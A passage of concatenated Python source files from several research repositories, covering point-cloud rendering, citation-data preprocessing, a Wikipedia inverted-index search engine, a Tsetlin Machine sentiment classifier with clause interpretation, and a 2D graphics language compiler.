<ViewSettings TrackScale="1.1246486" NearPlane="0.30310887" FarPlane="8.6538372"/>
</project>
""",
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera BinaryData="0" FocalMm="32.833454" LensDistortion="0 0" TranslationVector="1.41071 0.41359 -1.67635 1" CenterPx="788 513" RotationMatrix="-0.673956 -0.396539 -0.62333 0 0.434634 -0.895095 0.099491 0 -0.597392 -0.203868 0.775604 0 0 0 0 1 " PixelSizeMm="0.0369161 0.0369161" ViewportPx="1577 1027" CameraType="0"/>
<ViewSettings NearPlane="0.30310887" FarPlane="8.6567221" TrackScale="1.3598638"/>
</project>
""",
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera CameraType="0" LensDistortion="0 0" PixelSizeMm="0.0369161 0.0369161" TranslationVector="-0.791357 -1.14453 1.85737 1" CenterPx="788 513" ViewportPx="1577 1027" BinaryData="0" RotationMatrix="-0.449984 -0.653999 -0.608112 0 -0.80566 0.59106 -0.0394969 0 0.385262 0.472159 -0.792868 0 0 0 0 1 " FocalMm="32.833454"/>
<ViewSettings FarPlane="8.79844" NearPlane="0.30310887" TrackScale="1.3827369"/>
</project>
""",
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera FocalMm="32.833435" TranslationVector="0.664746 -2.25634 -0.372164 1" ViewportPx="1577 1027" CenterPx="788 513" CameraType="0" BinaryData="0" LensDistortion="0 0" PixelSizeMm="0.0369161 0.0369161" RotationMatrix="0.727616 0.0788547 0.681437 0 0.643869 0.264198 -0.718076 0 -0.236658 0.96124 0.141462 0 0 0 0 1 "/>
<ViewSettings NearPlane="0.30310887" FarPlane="7.4027324" TrackScale="1.245262"/>
</project>
""",
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera BinaryData="0" FocalMm="32.833454" LensDistortion="0 0" TranslationVector="1.41071 0.41359 -1.67635 1" CenterPx="788 513" RotationMatrix="-0.673956 -0.396539 -0.62333 0 0.434634 -0.895095 0.099491 0 -0.597392 -0.203868 0.775604 0 0 0 0 1 " PixelSizeMm="0.0369161 0.0369161" ViewportPx="1577 1027" CameraType="0"/>
<ViewSettings NearPlane="0.30310887" FarPlane="8.6567221" TrackScale="1.3598638"/>
</project>
""",
]
# rotation_string = ""
for rotation_string in Ss:
if rotation_string.strip() == '':
R = np.eye(3)
else:
match = re.search(r'RotationMatrix=".*0 0 0 1 "', rotation_string)
s = str(match.group(0))
elements = [float(x) for x in s.split('=')[1].strip('"').split()]
R = np.array(elements).reshape((4, 4))
R = R[:3, :3].T
Rs.append(R)
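# Each string in Ss is a MeshLab/VCG camera description; the regex pulls the 16
# numbers of its RotationMatrix attribute, reshapes them into a 4x4 matrix,
# transposes it and keeps the upper-left 3x3 block, so Rs ends up holding one
# 3x3 rotation matrix per saved viewpoint (an empty string falls back to identity).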
def parse_args():
parser = ArgumentParser()
parser.add_argument('--self_color_files', type=str, nargs='+', default=[])
parser.add_argument('--default_color_files', type=str, nargs='+', default=[])
parser.add_argument('--bg_color_files', type=str, nargs='+', default=[])
parser.add_argument('--radius', type=float, default=0.020 * 2)
parser.add_argument('--spacing', type=float, default=2.5)
parser.add_argument('--mitsuba', type=str, default='/Users/jiviteshjain/Installs/mitsuba2/build/dist/mitsuba', help='Path to mitsuba2 installation.')
parser.add_argument('--out_file', type=str, required=True, help='Output file path.')
parser.add_argument('--in_dir', type=str, default='', help='Optional path prefex for input files.')
return parser.parse_args()
def run(args, frame_id, angle, box=None):
out_folder = os.path.dirname(args.out_file)
out_file = os.path.basename(args.out_file)
out_file_name, out_file_ext = os.path.splitext(out_file)
out_file_name += str(frame_id).zfill(3)
out_file_path = os.path.join(out_folder, out_file_name + out_file_ext)
renderer = Renderer(args.mitsuba, args.radius * 0.5, args.radius, 600, out_file_path, XML_HEAD, XML_TAIL, XML_SPHERE, scale_radius=True)
for i, file in enumerate(args.self_color_files):
if i != 100:
renderer.add_pcd(os.path.join(args.in_dir, file), 'self', Rs[i // 4])
else:
renderer.add_pcd(os.path.join(args.in_dir, file), 'self', Rs[0])
renderer.preprocess_grid(ROW_DIR, COL_DIR, args.spacing * 1, args.spacing * 1.1)
for i, file in enumerate(args.default_color_files):
if i != 100:
renderer.add_pcd(os.path.join(args.in_dir, file), 'default', Rs[i // 4])
else:
renderer.add_pcd(os.path.join(args.in_dir, file), 'default', np.eye(3))
renderer.preprocess_grid(ROW_DIR, COL_DIR, args.spacing * 1, args.spacing * 1.1, offset=len(args.self_color_files))
for i, file in enumerate(args.bg_color_files):
if i != 100:
renderer.add_pcd(os.path.join(args.in_dir, file), 'bg', Rs[i // 4])
else:
renderer.add_pcd(os.path.join(args.in_dir, file), 'bg', Rs[0])
renderer.preprocess_grid(ROW_DIR, COL_DIR, args.spacing * 1, args.spacing * 1.1, offset=len(args.self_color_files)+len(args.default_color_files))
# renderer.process(np.array([0, 0, 1], dtype=np.float32), angle)
return renderer.process(-ROT_DIR, angle, box)
if __name__ == '__main__':
args = parse_args()
box = None
for frame_id, angle in enumerate(np.linspace(start=-0.698132, stop=0.698132, num=150)[1:]):
print('FRAME:', frame_id)
box = run(args, frame_id, angle, box)
# break
if frame_id % 5 == 0:
print('SLEEP')
time.sleep(2)
``` |
{
"source": "jiviteshjain/why-cite",
"score": 3
} |
#### File: evaluation/similarity/test_sim.py
```python
import torch
from style_paraphrase.evaluation.similarity.sim_models import WordAveraging
from style_paraphrase.evaluation.similarity.sim_utils import Example
from nltk.tokenize import TreebankWordTokenizer
import sentencepiece as spm
tok = TreebankWordTokenizer()
model = torch.load('style_paraphrase/evaluation/similarity/sim/sim.pt')
state_dict = model['state_dict']
vocab_words = model['vocab_words']
args = model['args']
# turn off gpu
model = WordAveraging(args, vocab_words)
model.load_state_dict(state_dict, strict=True)
sp = spm.SentencePieceProcessor()
sp.Load('style_paraphrase/evaluation/similarity/sim/sim.sp.30k.model')
model.eval()
def make_example(sentence, model):
sentence = sentence.lower()
sentence = " ".join(tok.tokenize(sentence))
sentence = sp.EncodeAsPieces(sentence)
wp1 = Example(" ".join(sentence))
wp1.populate_embeddings(model.vocab)
return wp1
def find_similarity(s1, s2):
with torch.no_grad():
s1 = [make_example(x, model) for x in s1]
s2 = [make_example(x, model) for x in s2]
wx1, wl1, wm1 = model.torchify_batch(s1)
wx2, wl2, wm2 = model.torchify_batch(s2)
scores = model.scoring_function(wx1, wm1, wl1, wx2, wm2, wl2)
return [x.item() for x in scores]
# s1 = "the dog ran outsideddd."
# s2 = "the puppy escape into the trees."
# print(find_similarity([s1, s2], [s2, s2]))
```
#### File: src/scripts/preprocess_aclarc.py
```python
import re
import jsonlines
file_names = [
"dev.jsonl",
"train.jsonl",
"test.jsonl"
]
def process_json(data):
text = data['text']
extended = data['extended_context']
cleaned = data['cleaned_cite_text']
new_text = extended.replace(text, cleaned)
data['extended_context'] = new_text
return data
if __name__ == '__main__':
for file_name in file_names:
instances = list(jsonlines.open(f"../../data/acl-arc/{file_name}"))
new_instances = list(map(process_json, instances))
f = open(f"../../data/acl-arc/processed_{file_name}", "w")
writer = jsonlines.Writer(f)
writer.write_all(new_instances)
f.close()
# print(new_instances[0]['extended_context'])
```
#### File: src/scripts/sectionNames_scicitetest.py
```python
import re
import numpy as np
import jsonlines
file_names = [
"dev.jsonl",
"train.jsonl",
"test.jsonl"
]
def process_json(data):
extended = data['sectionName']
print(extended)
try:
if("discussion" in extended.lower()):
print("yes")
data['sectionName'] = "discussion"
elif("introduction" in extended.lower()):
print("yes")
data['sectionName'] = "introduction"
elif("related work" in extended.lower()):
print("yes")
data['sectionName'] = "related work"
elif("method" in extended.lower()):
print("yes")
data['sectionName'] = "methods"
elif("experiments" in extended.lower()):
data['sectionName'] = "experiments"
elif("results" in extended.lower()):
data['sectionName'] = "results"
elif("conclusion" in extended.lower()):
data['sectionName'] = "conclusion"
else: data['sectionName'] = None
except:
data['sectionName'] = None
# extended = data['sectionName']
# print(extended.lower())
return data
if __name__ == '__main__':
for file_name in file_names:
instances = list(jsonlines.open(f"../../data/scicite/{file_name}"))
new_instances = list(map(process_json, instances))
f = open(f"../../data/scicite/processed_{file_name}", "w")
writer = jsonlines.Writer(f)
writer.write_all(new_instances)
f.close()
``` |
{
"source": "jiviteshjain/wiki-search",
"score": 3
} |
#### File: wiki-search/src-hi/merge.py
```python
import os
import heapq
import config as conf
import sys
import shutil
class HeapNode:
def __init__(self, word, posting_list, file_id):
self._word = word
self._posting_list = posting_list
self._file_id = file_id
def Word(self):
return self._word
def PostingList(self):
return self._posting_list
def FileId(self):
return self._file_id
def __lt__(self, other):
if self._word != other.Word():
return self._word < other.Word()
return self._file_id < other.FileId()
class FinalFileHandler:
def __init__(self, path):
self._path = path
self._file_count = 0
self._heads = []
self._lines = []
self._word_count = 0
def AddLine(self, word, posting_list):
if len(self._lines) == 0:
self._heads.append(word)
line = word + ':' + posting_list
self._lines.append(line)
self._word_count += 1
if len(self._lines) >= conf.TOKENS_PER_FINAL_FILE:
with open(os.path.join(self._path, f'{self._file_count}.txt'), 'w') as f:
for line in self._lines:
f.write(line + '\n')
self._file_count += 1
self._lines = []
def Close(self):
        if len(self._lines) > 0:
with open(os.path.join(self._path, f'{self._file_count}.txt'), 'w') as f:
for line in self._lines:
f.write(line + '\n')
self._file_count += 1
self._lines = []
if len(self._heads) > 0:
with open(os.path.join(self._path, conf.FIRST_WORD_FILE), 'w') as f:
for line in self._heads:
f.write(line + '\n')
self._heads = []
return self._word_count
class IntermediatePageHandler:
def __init__(self, path):
self._path = os.path.join(path, conf.INTERMED_DIR)
self._files = []
for file in os.listdir(self._path):
try:
f = open(os.path.join(self._path, file), 'r', conf.INTERMED_FILE_READ_BUFFER)
self._files.append(f)
except IOError:
print(f'Failed to open intermediate file: {file}. Skipping.', file=sys.stderr)
self._eofs = set()
def __len__(self):
return len(self._files)
def ReadLine(self, file_id):
if file_id in self._eofs:
return None
try:
line = self._files[file_id].readline().strip()
except IOError:
print(f'Failed to read from intermediate file: {file_id}. Skipping.', file=sys.stderr)
self._eofs.add(file_id)
return None
if len(line) == 0:
self._eofs.add(file_id)
return None
word, posting_list = line.split(':')
return HeapNode(word, posting_list, file_id)
def Close(self):
for f in self._files:
try:
f.close()
except IOError:
print(f'Failed to close an intermediate file. Skipping.', file=sys.stderr)
pass
shutil.rmtree(self._path)
def Merge(path):
intermed_handler = IntermediatePageHandler(path)
    heap = [node for node in (intermed_handler.ReadLine(i) for i in range(len(intermed_handler))) if node is not None]  # skip files that are already empty
heapq.heapify(heap)
final_handler = FinalFileHandler(path)
current_word = ''
current_posting_list = ''
while len(heap) > 0:
next_node = heap[0]
heapq.heappop(heap)
if next_node.Word() == current_word:
current_posting_list += next_node.PostingList()
else:
if len(current_posting_list) > 0:
final_handler.AddLine(current_word, current_posting_list)
current_word = next_node.Word()
current_posting_list = next_node.PostingList()
new_node = intermed_handler.ReadLine(next_node.FileId())
if new_node is not None:
heapq.heappush(heap, new_node)
if len(current_posting_list) > 0:
final_handler.AddLine(current_word, current_posting_list)
word_count = final_handler.Close()
intermed_handler.Close()
return word_count
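# Each intermediate file holds lines of the form "word:postings", already sorted
# by word. Merge() repeatedly pops the smallest (word, file_id) pair off the heap,
# so postings for the same word coming from different files are concatenated in
# file order before being written out once, e.g. (made-up lines)
#   file 0: "apple:d1t2"    file 1: "apple:d7b1"
# become the single final line "apple:d1t2d7b1".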
```
#### File: wiki-search/src-hi/search.py
```python
import os
import config as conf
from bisect import bisect_right
from parse import TextProcessor
import linecache
from multiprocessing import Pool
from itertools import repeat
import math
from random import randrange
from datetime import datetime, timedelta
class IndexHeadsManager:
def __init__(self, path):
with open(os.path.join(path, conf.FIRST_WORD_FILE), 'r') as f:
self._heads = [h.strip() for h in f.readlines()]
# UNUSED
def _BinarySearch(self, key):
low = 0
high = len(self._heads) - 1
while low <= high:
mid = (low + high) // 2
if self._heads[mid] == key:
return mid
elif self._heads[mid] < key:
if mid < high and self._heads[mid + 1] <= key:
low = mid + 1
else:
return mid
else:
high = mid - 1
return -1
def GetFile(self, key):
# From Python's documentation of bisect. Returns the rightmost
# element less than or equal to key.
# Returns -1 if not found.
return bisect_right(self._heads, key) - 1
class TitleManager:
def __init__(self, path):
self._path = os.path.join(path, conf.TITLES_DIR)
def GetTitle(self, article_id):
file_id = article_id // conf.TITLES_PER_FILE
line_num = (article_id % conf.TITLES_PER_FILE) + 1
# Returns empty string on error.
return linecache.getline(os.path.join(self._path, f'{file_id}.txt'), line_num).strip().lower()
# UNUSED
def FieldAgnosticSearch(token, index_heads, path):
search_results = {
't': [], 'i': [], 'b': [], 'c': [], 'l': [], 'r': []
}
file_id = index_heads.Search(token)
if file_id < 0:
return search_results
with open(os.path.join(path, f'{file_id}.txt'), 'r') as f:
for line in f:
word, posting_string = line.strip().split(':')
if word == token:
break
else:
return search_results
    posting_list = posting_string.split('d')[1:] # Guaranteed to start with 'd' and be non-empty.
# Skip the empty string in the beginning.
parsed_posting_list = [Searcher._ParsePosting(p) for p in posting_list]
for doc in parsed_posting_list:
for field in doc.keys():
if field != 'd':
search_results[field].append(doc['d'])
return search_results
def ProcessPostingString(posting_string, fields, num_docs):
posting = Searcher.ParsePosting(posting_string)
tf = ((conf.WEIGHT_TITLE * posting['t']) + \
(conf.WEIGHT_INFOBOX * posting['i']) + \
(conf.WEIGHT_BODY * posting['b']) + \
(conf.WEIGHT_CATEGORY * posting['c']) + \
(conf.WEIGHT_LINKS * posting['l']) + \
(conf.WEIGHT_REFERENCES * posting['r']) + 1)
# Only in case of field queries, increase the weights of those fields.
for field in fields:
if field != 'a':
tf += (conf.WEIGHT_REQUESTED_FIELD * posting[field])
idf = conf.NUM_ARTICLES / num_docs
return posting['d'], math.log10(tf) * math.log10(idf)
class Searcher:
def __init__(self, path, text_processor, index_heads, titles, pool):
self._path = path
self._text_processor = text_processor
self._index_heads = index_heads
self._titles = titles
self._pool = pool
@classmethod
def _ParseQueryFields(cls, query):
if ':' not in query:
return {'a': query}
query_fields = {}
query_parts = query.strip().split(':')
for i in range(1, len(query_parts)):
field = query_parts[i-1][-1]
field_string = query_parts[i]
if i != len(query_parts)-1:
field_string = field_string[:-1]
if field in query_fields:
query_fields[field] += (' ' + field_string)
else:
query_fields[field] = field_string
return query_fields
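    # Example (hypothetical query): "t:deep learning b:graphs" parses to
    # {'t': 'deep learning ', 'b': 'graphs'} -- the single character just before
    # each ':' names the field -- while a query without ':' maps to {'a': query}.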
@classmethod
def ParsePosting(cls, posting):
parsed_posting = {}
field = 'd'
cur = ''
for c in posting:
if c.isalpha() and c.islower():
parsed_posting[field] = int(cur, base=conf.ENCODING_BASE)
field = c
cur = ''
else:
cur += c
if len(cur) > 0:
parsed_posting[field] = int(cur, base=conf.ENCODING_BASE)
# Set empty fields to 0.
for field in ('t', 'i', 'b', 'c', 'l', 'r'): # 'd' is guaranteed to be present.
if field not in parsed_posting:
parsed_posting[field] = 0
return parsed_posting
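    # Example: a posting string such as "12t3b1" decodes (in base
    # conf.ENCODING_BASE) to {'d': int('12', base), 't': int('3', base),
    # 'b': int('1', base)} with the remaining fields ('i', 'c', 'l', 'r')
    # filled in as 0; the leading digits are always the document id.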
def _SearchToken(self, token, fields):
file_id = self._index_heads.GetFile(token)
if file_id < 0:
return {}
with open(os.path.join(self._path, f'{file_id}.txt'), 'r') as f:
for line in f:
                word, posting_string = line.strip().split(':') # Guaranteed to have ':' and
# non empty parts on both sides.
if word == token:
break
else:
return {}
        posting_list = posting_string.split('d')[1:] # Guaranteed to start with 'd' and be non-empty.
# Skip the empty string in the beginning.
search_results = self._pool.starmap(ProcessPostingString,
zip(posting_list, repeat(fields), repeat(len(posting_list))))
return search_results
def Search(self, query):
query_fields = self._ParseQueryFields(query)
# Invert the query fields, storing for every token, the field(s)
# in which it is desired.
query_tokens = {}
for field, field_string in query_fields.items():
field_tokens = self._text_processor.Clean(field_string)
for token in field_tokens:
if token not in query_tokens:
query_tokens[token] = [field, ]
else:
query_tokens[token].append(field)
token_matches = [self._SearchToken(*x) for x in zip(query_tokens.keys(),
query_tokens.values())]
# Aggregate results across terms, by adding the scores.
scored_matches = {}
for token_match in token_matches:
for article_id, tfidf in token_match:
if article_id in scored_matches:
scored_matches[article_id] += tfidf
else:
scored_matches[article_id] = tfidf
# Sort the results.
search_results = sorted(scored_matches.keys(), reverse=True,
key=lambda x: scored_matches[x])
if conf.STRICTLY_RETURN_NUM_RESULTS:
while len(search_results) < conf.NUM_RESULTS:
random_article_id = randrange(conf.NUM_ARTICLES)
if random_article_id not in search_results:
search_results.append(random_article_id)
entitled_search_results = [(r, self._titles.GetTitle(r))
for r in search_results[:conf.NUM_RESULTS]]
return entitled_search_results
# %%
def Search(index_path, queries):
text_processor = TextProcessor()
index_heads = IndexHeadsManager(index_path)
titles = TitleManager(index_path)
pool = Pool(conf.NUM_SEARCH_WORKERS)
searcher = Searcher(index_path, text_processor, index_heads, titles, pool)
search_results = []
run_times = []
for query in queries:
begin = datetime.now()
search_results.append(searcher.Search(query))
end = datetime.now()
delta = end - begin
run_times.append(delta / timedelta(seconds=1))
pool.close()
pool.join()
return search_results, run_times
# %%
``` |
{
"source": "jivitesh-sharma/Drop-Clause-Interpretable-TM",
"score": 2
} |
#### File: Drop-Clause-Interpretable-TM/examples/SSTDemoWeightedClauses_Interpret.py
```python
import re
import string
import nltk
from nltk.tokenize import word_tokenize
from string import punctuation
from nltk.corpus import stopwords
nltk.download('punkt')
nltk.download('stopwords')
import pandas as pd
from nltk.stem import PorterStemmer
from nltk import FreqDist
from nltk.tokenize import RegexpTokenizer
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn import metrics
from PyTsetlinMachineCUDA.tm import MultiClassTsetlinMachine
nltk.download('wordnet')
from time import time
stop_words = set(stopwords.words('english'))
tokenizerR = RegexpTokenizer(r'\w+')
from numpy import save
from nltk.stem import WordNetLemmatizer
stop_words = set(stopwords.words('english'))
alpha = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
from argparse import ArgumentParser
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
parser = ArgumentParser()
parser.add_argument('-interpret', type=bool, default=False)
parser.add_argument('-n_clauses_per_class', type=int, default=5000)
parser.add_argument('-s', type=float, default=5.0)
parser.add_argument('-T', type=int, default=80)
parser.add_argument('-drop_clause', type=float, default=0.0)
parser.add_argument('-state_bits', type=int, default=8)
parser.add_argument('-features', type=int, default=7500)
parser.add_argument('-gpus', type=int, default=1)
parser.add_argument('-stop_train', type=int, default=250)
config = parser.parse_args()
col_list = ["text", "label"]
df = pd.read_csv('sst2.csv')
label = df.iloc[:,0:1].values
textOrig = df.iloc[:,1:2].values
y = np.reshape(label, len(label))
print(textOrig.shape)
def prepreocess(data):
input_data=[]
vocab = []
for i in data:
for j in i:
j = j.lower()
j = j.replace("\n", "")
j = j.replace('n\'t', 'not')
j = j.replace('\'ve', 'have')
j = j.replace('\'ll', 'will')
j = j.replace('\'re', 'are')
j = j.replace('\'m', 'am')
j = j.replace('/', ' / ')
j = j.replace('-', ' ')
j = j.replace('!', ' ')
j = j.replace('?', ' ')
j = j.replace('+', ' ')
j = j.replace('*', ' ')
while " " in j:
j = j.replace(' ', ' ')
while ",," in j:
j = j.replace(',,', ',')
j = j.strip()
j = j.strip('.')
j = j.strip()
temp1 = tokenizerR.tokenize(j)
temp2 = [x for x in temp1 if not x.isdigit()]
temp3 = [w for w in temp2 if not w in alpha]
#temp4 = [w for w in temp3 if not w in stop_words]
input_data.append(temp3)
return input_data
input_text = prepreocess(textOrig)
inputtext = []
for i in input_text:
ps = PorterStemmer()
temp4 = []
for m in i:
temp_temp =ps.stem(m)
temp4.append(temp_temp)
inputtext.append(temp4)
newVocab =[]
for i in inputtext:
for j in i:
newVocab.append(j)
print(len(newVocab))
fdist1 = FreqDist(newVocab)
tokens1 = fdist1.most_common(config.features)
full_token_fil = []
for i in tokens1:
full_token_fil.append(i[0])
sum1 = 0
for j in tokens1:
sum1 += j[1]
print('sum1', sum1)
vocab_unique = full_token_fil
vocab = np.asarray(full_token_fil)
np.savetxt('sst_vocab.csv', vocab, delimiter=',', fmt='%s')
def binarization_text(data4):
feature_set = np.zeros([len(data4), config.features], dtype=np.uint8)
tnum=0
for t in data4:
for w in t:
if (w in vocab_unique):
idx = vocab_unique.index(w)
feature_set[tnum][idx] = 1
tnum += 1
return feature_set
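# binarization_text yields a binary bag-of-words matrix: row t has a 1 in column
# idx exactly when vocabulary word vocab_unique[idx] occurs in document t (term
# frequency is discarded), which is the Boolean feature format the Tsetlin
# Machine consumes.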
X_text = binarization_text(inputtext)
print("Text length:", X_text.shape)
tt = 6920
X_train = X_text[0:tt,:]
print("X_train length:", X_train.shape)
X_test = X_text[tt:,:]
print("X_test length:", X_test.shape)
ytrain = y[0:tt]
ytest = y[tt:]
print(ytest.shape)
X_dev = X_text[tt:,:]
Y_dev = y[tt:]
tm1 = MultiClassTsetlinMachine(config.n_clauses_per_class*2, config.T*16, config.s, clause_drop_p=config.drop_clause, number_of_gpus=config.gpus, number_of_state_bits=config.state_bits)
f = open("sst_weighted_%.1f_%d_%d_%.2f_%d_aug.txt" % (s, clauses, T, drop_clause, number_of_state_bits), "w+")
r_25 = 0
r_50 = 0
max = 0.0
for i in range(config.stop_train):
start_training = time()
tm1.fit(X_train, ytrain, epochs=1, incremental=True)
stop_training = time()
start_testing = time()
result2 = 100*(tm1.predict(X_train) == ytrain).mean()
result1 = 100*(tm1.predict(X_test) == ytest).mean()
#result1 = 0
stop_testing = time()
if result1 > max:
max = result1
if i >= 350:
r_50+=result1
if i >= 375:
r_25+=result1
print("#%d AccuracyTrain: %.2f%% AccuracyTest: %.2f%% Training: %.2fs Testing: %.2fs" % (i+1, result2, result1, stop_training-start_training, stop_testing-start_testing), file=f)
print("Average Accuracy last 25 epochs: %.2f \n" %(r_25/25), file=f)
print("Average Accuracy last 50 epochs: %.2f \n" %(r_50/50), file=f)
print("Max Accuracy: %.2f \n" %(max), file=f)
if config.interpret:
print('predicted Class: ', tm1.predict(X_train[4245:4246,:]))
triggClause = tm1.transform(X_train[4245:4246,:])
clauseIndex = []
for i in range(len(triggClause[0])):
if triggClause[0][i] ==1:
clauseIndex.append(i)
import nltk
from nltk.probability import FreqDist
originalFeatures = []
negatedFeatures = []
number_of_features = 1000
for j in range(0, 1500, 2):
#print("Clause #%d (%d): " % (j, tm1.get_weight(1, j)), end=' ')
l = []
for k in range(number_of_features*2):
if tm1.ta_action(0, j, k) == 1:
if k < number_of_features:
l.append(" x%d" % (k))
originalFeatures.append(k)
else:
l.append("¬x%d" % (k-number_of_features))
negatedFeatures.append(k-number_of_features)
#print(" ∧ ".join(l))
fdist1 = FreqDist(negatedFeatures)
negatedWords = fdist1.most_common(200)
fdist2 = FreqDist(originalFeatures)
originalWords = fdist2.most_common(20)
print('full original word')
fulloriginalword=[]
for i in originalWords:
fulloriginalword.append(i[0])
fullnegatedword =[]
print('full negated word')
for i in negatedWords:
fullnegatedword.append(i[0])
originalFeatures2 = []
negatedFeatures2= []
for j in clauseIndex:
if j < 1500 and j%2==0:
#print("Clause #%d (%d): " % (j, tm1.get_weight(1, j)), end=' ')
l = []
for k in range(number_of_features*2):
if tm1.ta_action(0, j, k) == 1:
if k < number_of_features:
l.append(" x%d" % (k))
originalFeatures2.append(k)
else:
l.append("¬x%d" % (k-number_of_features))
negatedFeatures2.append(k-number_of_features)
fdist3 = FreqDist(negatedFeatures2)
negatedWords2 = fdist3.most_common(100)
fdist4 = FreqDist(originalFeatures2)
originalWords2 = fdist4.most_common(10)
neededoriginalword =[]
print('needed original word')
for i in originalWords2:
neededoriginalword.append(i[0])
needednegatedword =[]
print('needed negated word')
for i in negatedWords2:
needednegatedword.append(i[0])
#Save fulloriginalword, fullnegatedword, neededoriginalword, or needednegatedword (Preferred needednegatedword for interpretability)
interpretList = np.asarray(needednegatedword)
np.savetxt('interpretFile.csv', interpretList, fmt='%s')
df = pd.read_csv('interpretFile.csv', dtype=str, header=None)
df1 = df.iloc[:,:]
full1 = df.iloc[:,:].values
#full1= np.reshape(full1,(10,20))
index = np.arange(100)
letter2num = {}
for i in range(len(index)):
letter2num[full1[i][0]] =i
print(letter2num)
df2 = pd.DataFrame(np.array( [letter2num[i] for i in df1.values.flat] ).reshape(df1.shape))
print(df2)
colors = ["white"] # use hex colors here, if desired.
cmap = ListedColormap(colors)
full2 = df.iloc[:,:].values
full2= np.reshape(full2,(10,10))
full3 = df2.iloc[:,:].values
full3= np.reshape(full3,(10,10))
fig, ax = plt.subplots()
ax.imshow(full3,cmap='YlOrBr_r')
for i in range(len(full2)):
for j in range(10):
ax.text(j,i, full2[i,j], ha="center", va="center")
plt.axis('off')
ax.set_aspect(0.3)
plt.grid(True)
plt.show()
``` |
{
"source": "Jivko26/Python-Playground",
"score": 4
} |
#### File: Python-Playground/Gregory-Leibnitz Pi approximation/Solution.py
```python
calculations = int(input())
def leibnitz(calculations):
divider = 3
n = 2
result = 1/1
while n <= calculations:
if n % 2 == 0:
result -= 1/divider
else:
result += 1/divider
divider += 2
n += 1
return 4 * result
output = leibnitz(calculations)
print(output)
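# The loop accumulates the Gregory-Leibniz series
#   pi = 4 * (1 - 1/3 + 1/5 - 1/7 + ...),
# using `calculations` terms in total, so e.g. leibnitz(1000) is roughly 3.1406
# (the error of the partial sum shrinks on the order of 1/n).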
``` |
{
"source": "jivnov/Language-for-2D-graphics",
"score": 4
} |
#### File: Language-for-2D-graphics/twodim_compiler/drawing.py
```python
import svgwrite as svg
from graph import Vertex, Graph
class Drawing2d:
def __init__(self, w, h, output_path='./generated_images/output.svg'):
"""
:param w:
:param h:
"""
self.viewport_width = w
self.viewport_height = h
self.canvas = svg.Drawing(output_path, (w, h))
def draw(self, v: Vertex, parent: Vertex = None):
# TODO: Draw all neighbours and neighbours' neighbours etc.
"""
Basic algo:
1. Go "up" (check the IN reference) until you reach the root of the graph
NOTE: When adding a neighbour A to a Vertex B CONTAINED in some shape X, you should add "A IN X" relation automatically as well
2. Draw root shape parent_graphX
3. Call algo for each of X's neighbours until there are no neighbours to draw
:param parent: Parent of the vertex; if None, assume this is the root
:param v:
:return:
"""
if v.drawn:
return
v.draw(self.canvas)
def _graph_to_something_insertable(self, graph: Graph):
# TODO: This helper method should enable defining relations between Vertices and Graphs
# TIP: We may want to use <defs> tag for this
pass
```
#### File: Language-for-2D-graphics/twodim_compiler/FunctionParserListener.py
```python
import graph
from Function import Function
from TwoDimParser import TwoDimParser
from TwoDimParserListener import TwoDimParserListener
from exceptions import FunctionSignatureError
class FunctionParserListener(TwoDimParserListener):
def __init__(self, global_context, func_relations_graph, call_id=None):
super().__init__()
self.func_relations_graph = func_relations_graph
self.context = global_context
self.function_call_id = call_id
def enterShapeSpec(self, ctx: TwoDimParser.ShapeSpecContext):
try:
for i, var_name in enumerate(ctx.IDENTIFIER()):
# TODO
# At the moment assuming SIZE is the only argument
color_vals = None
if ctx.shapeColor(i) is not None:
color_vals = tuple(int(decimal_lit.getText()) for decimal_lit in ctx.shapeColor(i).DECIMAL_LIT())
v = graph.Vertex(parent_graph=self.func_relations_graph,
shape=ctx.typeName().getText(),
args=[size_lit.getText() for size_lit in ctx.shapeArguments(i).SIZE_LIT()],
color=color_vals
)
self.func_relations_graph.add_vertex(v)
self.context.variables.add_variable(tag=var_name.getText(), name=v.uid, content=v, scope=self.function_call_id)
except Exception as e:
message = f"Line {ctx.start.line}, {type(e).__name__}: {'' if len(e.args) == 0 else e.args[0]}"
exception_type = e.__class__
raise exception_type(message)
def enterAssignmentDeclarationStmt(self, ctx: TwoDimParser.AssignmentDeclarationStmtContext):
try:
v_from_func: graph.Vertex = self.enterFunctionCall(ctx.functionCall())
# Remove the function call after calculating its output so the Walker doesn't enter it a second time
ctx.removeLastChild()
# TODO: At the moment assuming SIZE is the only argument
v = graph.Vertex(parent_graph=self.func_relations_graph,
shape='shape',
args=[size_lit.getText() for size_lit in ctx.shapeArguments().SIZE_LIT()],
content=v_from_func.content)
self.func_relations_graph.add_vertex(v)
self.context.variables.add_variable(tag=ctx.IDENTIFIER().getText(), name=v.uid, content=v)
except Exception as e:
message = f"Line {ctx.start.line}, {type(e).__name__}: {'' if len(e.args) == 0 else e.args[0]}"
exception_type = e.__class__
raise exception_type(message)
def enterRelationExpr(self, ctx: TwoDimParser.RelationExprContext):
var_name1 = ''
var_name2 = ''
try:
for relation_op_index in range(len(ctx.singleLevelRelationOp())):
var_name1 = ctx.primaryExpr(relation_op_index).operand().operandName().getText()
var_name2 = ctx.primaryExpr(relation_op_index + 1).operand().operandName().getText()
op1 = self.context.variables.find_var_by_tag(tag=var_name1, scope=self.function_call_id).data
op2 = self.context.variables.find_var_by_tag(tag=var_name2, scope=self.function_call_id).data
self.func_relations_graph\
.add_relation(op1, op2, graph.Relation.from_string(ctx.singleLevelRelationOp(relation_op_index).getText()))
except Exception as e:
message = f"Line {ctx.start.line}, {type(e).__name__}: {'' if len(e.args) == 0 else e.args[0]}"
exception_type = e.__class__
raise exception_type(message)
def enterFunctionCall(self, ctx: TwoDimParser.FunctionCallContext):
try:
# checking function call for correctness
args_for_check = []
args_for_call = []
argument_ids = [opName.IDENTIFIER().getText() for opName in ctx.operandName()]
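            # find_var_by_tag may hand back the Vertex directly or a tree node wrapping it
            # in .data; the loop below tries the direct form first, then falls back to .data.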
for id in argument_ids:
try:
v = self.context.variables.find_var_by_tag(tag=id, scope=self.function_call_id)
shape = v.shape
if len(args_for_check) == 0 or args_for_check[len(args_for_check) - 1][0] != shape:
args_for_check.append([shape, 1])
else:
args_for_check[len(args_for_check) - 1][1] += 1
if v.unreachable:
raise graph.UndeclaredShapeException(id)
args_for_call.append(v)
except:
